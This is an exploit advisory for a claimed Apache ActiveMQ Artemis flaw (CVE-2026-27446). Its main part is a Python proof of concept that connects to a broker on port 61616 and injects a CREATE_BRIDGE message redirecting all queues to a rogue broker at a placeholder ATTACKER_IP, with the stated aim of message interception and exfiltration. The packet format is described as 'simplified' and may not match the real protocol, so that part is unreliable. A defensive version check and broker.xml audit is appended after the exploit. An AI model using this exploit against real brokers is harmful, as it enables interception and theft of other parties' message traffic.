=============================================================================================================================================
| # Title     : Apache ActiveMQ Artemis Unauthorized Bridge Injection via Core Protocol                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://artemis.apache.org/components/artemis/                                                                              |
=============================================================================================================================================

[+] Summary : PoC CVE-2026-27446 targeting the Core protocol of Apache ActiveMQ Artemis on its default port 61616.

The code:

  - Establishes a raw TCP connection to the target broker.
  - Sends a minimal ARTEMIS handshake to verify Core protocol support.
  - Attempts to inject a simplified CREATE_BRIDGE control message that redirects traffic to a rogue broker.

If the broker is misconfigured (e.g., security disabled or management permissions improperly restricted), an attacker could potentially create a bridge without authentication, resulting in:

  - Message interception
  - Traffic redirection
  - Data exfiltration
  - Broker trust abuse

[+] Affected Versions

  Apache Artemis: 2.50.0 → 2.51.0
  Apache ActiveMQ Artemis: 2.11.0 → 2.44.0

[+] Fixed in: Apache Artemis 2.52.0

[+] POC :

import socket
import struct

TARGET_IP = "192.168.1.100"
TARGET_PORT = 61616
ATTACKER_IP = "192.168.1.50"


def create_core_packet(payload):
    """Wraps the data in the Core protocol format (Length + Data)"""
    return struct.pack('>I', len(payload)) + payload


def check_vulnerability():
    sock = None  # defined up front so the finally block cannot hit an unbound name
    try:
        print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_IP, TARGET_PORT))

        # Minimal handshake: the ARTEMIS marker followed by a 4-byte big-endian value
        handshake = b"ARTEMIS" + struct.pack('>I', 1)
        sock.send(handshake)
        response = sock.recv(1024)

        if b"ARTEMIS" not in response:
            print("[-] Target does not seem to support Artemis Core protocol.")
            return

        print("[+] Handshake successful. Target supports Core protocol.")
        print(f"[*] Sending malicious Bridge redirection to {ATTACKER_IP}...")

        # Simplified CREATE_BRIDGE control message, length-prefixed by create_core_packet()
        evil_payload = f"CREATE_BRIDGE;name=exploit;uri=tcp://{ATTACKER_IP}:61616;queue=ANY".encode()
        sock.send(create_core_packet(evil_payload))
        print("[!] Packet sent. Monitor your rogue broker for incoming connections.")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        if sock is not None:
            sock.close()


if __name__ == "__main__":
    check_vulnerability()

Greetings to :
=============================================================================================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
=============================================================================================================================================
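
A defender-side check for the conditions this advisory names, as an added example that is not part of the original advisory or of the Artemis project: it compares a broker version against the affected ranges listed above and audits a broker.xml for disabled security and for `manage` permission granted outside a trusted role set. The sample XML, the `trusted_roles` parameter, and the reading of "management permissions" as the `manage` permission type in `security-settings` are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample broker.xml fragment (not taken from the advisory).
SAMPLE_BROKER_XML = """<configuration xmlns="urn:activemq">
  <core xmlns="urn:activemq:core">
    <security-enabled>false</security-enabled>
    <security-settings>
      <security-setting match="#">
        <permission type="send" roles="amq,guest"/>
        <permission type="manage" roles="amq,guest"/>
      </security-setting>
      <security-setting match="orders.#">
        <permission type="manage" roles="amq"/>
      </security-setting>
    </security-settings>
  </core>
</configuration>"""

# Affected ranges exactly as listed in the advisory (both ends inclusive).
AFFECTED = {
    "Apache Artemis": ((2, 50, 0), (2, 51, 0)),
    "Apache ActiveMQ Artemis": ((2, 11, 0), (2, 44, 0)),
}

def local(tag):
    # Strip the "{namespace}" prefix ElementTree puts on tag names.
    return tag.rsplit("}", 1)[-1]

def version_affected(product, version):
    """True if 'x.y.z' falls inside the advisory's range for that product name."""
    v = tuple(int(part) for part in version.split("."))
    low, high = AFFECTED[product]
    return low <= v <= high

def audit_broker_xml(xml_text, trusted_roles):
    """Return findings for disabled security and over-broad 'manage' grants."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = local(el.tag)
        if name == "security-enabled" and (el.text or "").strip().lower() == "false":
            findings.append("security-enabled is false: broker security is off")
        elif name == "security-setting":
            for perm in el:
                if local(perm.tag) == "permission" and perm.get("type") == "manage":
                    roles = {r.strip() for r in perm.get("roles", "").split(",") if r.strip()}
                    extra = sorted(roles - set(trusted_roles))
                    if extra:
                        findings.append(f"match={el.get('match')!r}: manage granted to {extra}")
    return findings
```

Call `audit_broker_xml(open("broker.xml").read(), {"amq"})` with the roles you actually intend to hold management rights; any finding on an affected version is a reason to prioritise the upgrade to the fixed release.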